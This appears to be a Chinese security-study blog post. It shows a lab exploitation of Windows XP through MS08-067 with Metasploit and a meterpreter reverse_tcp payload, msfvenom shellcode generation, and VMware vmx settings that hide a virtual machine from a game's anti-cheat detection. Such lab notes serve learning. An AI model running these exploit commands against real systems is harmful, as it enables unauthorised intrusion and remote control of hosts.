2021年5月

本文绝大多数内容来自于0Day安全这本书,因书本内容较为久远和本人水平有限,如存在错误的地方还望前辈指出。

image-20210520091443458

入侵Windows系统

书本种是利用CVE-2006-3439(KB921883)对目标Windows系统进行攻击。因为自己电脑上没有XPSP1的环境所以就选择MS-08-067作为本次实验的利用漏洞,目标主机系统为WindowsXP SP3。注意目标主机和攻击主机之间得相互可达(目标机关闭防火墙,双方可以Ping通)

//msf console
use windows/smb/ms08_067_netapi


//配置利用成功后返回的会话如何监听
set payload windows/meterpreter/reverse_tcp

//显示当前所选漏洞和 shellcode 需要配置的选项
show options
set rhost 目标IP
set lhost 攻击IP

exploit

image-20210520094519050

利用Msfvenom制作shellcode

详细的Msfvenom的使用方法可以看官方的使用wiki中文翻译

image-20210520100304211

//查看所用可用的payloads
msfvenom -l payloads

//生成弹出计算器的shellcode,-p选择payloads ,-e 选择编码器 ,-b shellcode不要出现哪些字符 ,-f 生成的shellcode的格式

msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b '\x00' -f c

image-20210520101157454

最近在52上看到有师傅对TP驱动保护进行了分析,想着照着学习一下,安装好游戏点开暴击,TP弹出提示不要再虚拟机运行游戏。

image-20210509163830095

这就吸引了我想要去解决这个问题,在论坛搜索了一番找到了解决方法:

解决办法

先用编辑器打开vmx文件

image-20210509164223514

在文件最后添加monitor_control.restrict_backdoor = "TRUE" ,注意要留出空白的一行,并且得关闭虚拟机进行修改

image-20210509164343239

这样子就可以在虚拟机里面运行游戏程序了(该方法应该只能解决简单的反虚拟机

image-20210509164701619

不过这样子操作后不能从主机拖拽文件到虚拟机了,可以尝试使用共享文件夹

参考配置链接:为虚拟机启用共享文件夹

原理

在16年Gslab竞赛中有到虚拟机检测的题目,这篇文章分析的还是比较详细的,除了上文中修改vmx的配置信息还有很多未文档化的配置:

isolation.tools.getPtrLocation.disable = "TRUE" 
isolation.tools.setPtrLocation.disable = "TRUE" 
isolation.tools.setVersion.disable = "TRUE" 
isolation.tools.getVersion.disable = "TRUE" 
monitor_control.disable_directexec = "TRUE" 
monitor_control.disable_chksimd = "TRUE" 
monitor_control.disable_ntreloc = "TRUE" 
monitor_control.disable_selfmod = "TRUE" 
monitor_control.disable_reloc = "TRUE" 
monitor_control.disable_btinout = "TRUE" 
monitor_control.disable_btmemspace = "TRUE" 
monitor_control.disable_btpriv = "TRUE" 
monitor_control.disable_btseg = "TRUE"

不过这些配置是比较影响运行效率的,而且大部分是对VMware Tools进行修改达到反反虚拟机的。